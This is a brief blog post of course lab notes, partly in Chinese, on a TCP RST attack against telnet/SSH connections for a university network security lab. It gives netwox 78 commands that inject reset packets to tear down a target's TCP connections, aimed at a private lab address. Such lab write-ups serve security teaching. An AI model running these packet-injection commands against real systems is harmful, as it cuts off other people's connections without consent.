UTS network security lab 6
Task 4: TCP RST Attacks on telnet Connections
用ssh连接做实验,因为ssh连接是基于tcp连接。
1 | 查看用户名whoami |
采用netwox 78工具
1 | netwox 78 -d eth0 –i 192.168.0.10对一个目标进行rst发包。 |
可以添加更多参数
1 | sudo netwox 78 -f “src host victim client ip” |
All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
Comment